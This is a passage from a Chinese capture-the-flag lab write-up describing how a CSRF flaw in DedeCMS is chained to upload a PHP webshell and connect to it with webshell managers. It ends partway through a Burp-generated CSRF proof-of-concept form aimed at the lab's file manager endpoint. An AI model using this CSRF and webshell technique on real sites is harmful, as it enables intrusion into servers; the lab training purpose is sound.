0x01 前言
这是掌控者靶场-训练营-漏洞组合利用靶场的第2道题。主要是利用CSRF跨站请求漏洞,上传php木马,再通过菜刀、蚁剑、哥斯拉等工具,连接php后门,通过题干,找到Flag。
0x02 CSRF跨站请求伪造
Cross-site request forgery,简称为CSRF,说直白点就是伪造请求、欺骗点击、达成目的。
图片引用自百度图片,若有侵权请联系我删除,3Q。
0x03 利用过程及踩坑
从传送门直达目标站点,可以看到是DEDECMS,网站下方给出了对应版本信息,可通过在本地搭建环境,通过burp抓取上传文件动作,转换为CSRF跨站脚本,这里直接提供靶场环境的:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form id="aa" action="http://59.63.200.79:8022/csrf/dede/file_manage_control.php" method="POST">
&